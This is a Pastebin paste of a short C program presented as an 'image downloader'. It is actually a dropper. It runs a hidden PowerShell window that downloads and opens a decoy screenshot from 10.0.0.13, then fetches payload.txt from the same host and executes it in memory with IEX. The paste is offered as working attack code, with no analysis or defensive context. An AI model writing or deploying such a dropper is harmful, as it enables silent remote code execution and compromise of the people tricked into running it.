Advertisement
codesynced

Executable C Code and Image Downloader

Jan 28th, 2016
7,115
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 0.34 KB | None | 0 0
  1. #include<stdio.h>
  2. main()
  3. {
  4.     system("powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://10.0.0.13/screenshot.jpg', 'C:\\Users\\Public\\screenshot.jpg') & start C:\\Users\\Public\\screenshot.jpg & powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.13/payload.txt'))\"");
  5.     return 0;
  6. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement